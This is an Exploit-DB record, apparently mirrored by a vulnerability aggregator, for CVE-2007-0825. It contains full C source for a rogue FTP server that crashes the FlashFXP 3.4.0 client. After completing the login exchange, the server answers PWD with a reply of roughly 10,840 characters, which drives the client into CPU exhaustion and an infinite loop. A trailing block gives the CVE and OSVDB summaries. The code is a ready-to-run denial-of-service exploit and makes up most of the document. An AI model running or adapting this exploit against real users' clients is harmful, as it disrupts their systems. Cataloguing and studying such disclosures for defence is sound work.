FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit

{"edition": 1, "type": "exploitdb", "bulletinFamily": "exploit", "viewCount": 1, "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "title": "FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit", "sourceHref": "https://www.exploit-db.com/download/3276/", "href": "https://www.exploit-db.com/exploits/3276/", "objectVersion": "1.0", "references": [], "cvelist": ["CVE-2007-0825"], "osvdbidlist": ["35796"], "modified": "2007-02-06T00:00:00", "id": "EDB-ID:3276", "reporter": "Marsu", "description": "FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit. CVE-2007-0825. Dos exploit for windows platform", "hash": "dddc1ca729ab9006bf7267b5504501cd7f705c6e868d09153ca4b05b82e93766", "history": [], "sourceData": "/***************************************************************************\r\n* FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS *\r\n* *\r\n* *\r\n* There's a strange bug in FlashFXP. *\r\n* When sending a long PWD command with more than 5420 \\ separated by at *\r\n* least one different char, it is possible to make the app unstable. *\r\n* It will first freeze during 45s consuming 100% resources, and then, if *\r\n* the user hits disconnect and then reconnects to the server it will enter *\r\n* in an infinite loop trying to put data on the stack. *\r\n* *\r\n* *\r\n* I admit it is a little bit tricky but maybe someone will find a better *\r\n* way to exploit this vuln. *\r\n* *\r\n* Have Fun! *\r\n* *\r\n* Coded by Marsu <Marsupilamipowa@hotmail.fr> *\r\n***************************************************************************/\r\n\r\n\r\n\r\n#include \"winsock2.h\"\r\n#include \"stdio.h\"\r\n#include \"stdlib.h\"\r\n#include \"windows.h\"\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\tchar recvbuff[1024];\r\n\tchar evilbuff[11000];\r\n\tsockaddr_in sin;\r\n\tint server,client;\r\n\tWSADATA wsaData;\r\n\tWSAStartup(MAKEWORD(1,1), &wsaData);\r\n\r\n\tint n=1;\r\n\twhile (n<=2)\r\n\t{\r\n\t\tserver = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\t\tsin.sin_family = PF_INET;\r\n\t\tsin.sin_addr.s_addr = htonl(INADDR_ANY);\r\n\t\tsin.sin_port = htons( 21 );\r\n\t\tbind(server,(SOCKADDR*)&sin,sizeof(sin));\r\n\t\tprintf(\"[*] Listening on port 21...\\n\");\r\n\t\tlisten(server,5);\r\n\t\tprintf(\"[*] Waiting for client ...\\n\");\r\n\t\tclient=accept(server,NULL,NULL);\r\n\t\tprintf(\"[+] Client connected\\n\");\r\n\r\n\r\n\t\tmemcpy(evilbuff,\"220 Hello there\\r\\n\\0\",18);\r\n\t\tmemset(recvbuff,'\\0',1024);\r\n\r\n\t\tif (send(client,evilbuff,strlen(evilbuff),0)==-1)\r\n\t\t{\r\n\t\t\tprintf(\"[-] Error in send!\\n\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\r\n\t\t//USER\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"331 \\r\\n\\0\",7);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\t\tSleep(50);\r\n\r\n\t\t//PASS\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"230 \\r\\n\\0\",7);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//SYST\r\n\t\tmemset(recvbuff,'\\0',1024);\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"215 WINDOWS\\r\\n\\0\",14);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//FEAT\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"211 END\\r\\n\\0\",10);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//PWD\r\n\t\tint i=5;\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\twhile (i<10840) {\r\n\t\t\tmemset(evilbuff+i,'a',1);\r\n\t\t\ti++;\r\n\t\t\tmemset(evilbuff+i,'//',1);\r\n\t\t\ti++;\r\n\t\t}\r\n\t\tmemcpy(evilbuff,\"257 \\\"\",5);\r\n\t\tmemcpy(evilbuff+10840,\"\\\"\\r\\n\\0\",4);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\t\tclosesocket(client);\r\n\t\tclosesocket(server);\r\n\t\tclient=server=NULL;\r\n\r\n\t\tif (n<2) {\r\n\t\t\tprintf(\"[+] Now FlashFXP is out for 45sec.\\n\");\r\n\t\t\tprintf(\"[+] Note that user MUST click on disconnect and then reconnect\\n \r\n to trigger the bug.\\n\\n\");\r\n\t\t}\r\n\t\tn++;\r\n\t}\r\n\tSleep(2000);\r\n\tprintf(\"\\n[+] FlashFXP must be DoSed\\n\");\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2007-02-06]\r\n", "published": "2007-02-06T00:00:00", "lastseen": "2016-01-31T18:06:55", "enchantments": {"vulnersScore": 5.5}}

{"result": {"cve": [{"id": "CVE-2007-0825", "type": "cve", "title": "CVE-2007-0825", "description": "FlashFXP 3.4.0 build 1145 allows remote servers to cause a denial of service (CPU consumption) via a response to a PWD command that contains a long string with deeply nested directory structure, possibly due to a buffer overflow.", "published": "2007-02-07T17:28:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0825", "cvelist": ["CVE-2007-0825"], "lastseen": "2017-07-29T11:21:52"}], "osvdb": [{"id": "OSVDB:35796", "type": "osvdb", "title": "FlashFXP PWD Command Long String Remote DoS", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 32416\nGeneric Exploit URL: http://milw0rm.com/exploits/3276\n[CVE-2007-0825](https://vulners.com/cve/CVE-2007-0825)\nBugtraq ID: 22433\n", "published": "2007-02-06T20:53:45", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:35796", "cvelist": ["CVE-2007-0825"], "lastseen": "2017-04-28T13:20:31"}]}}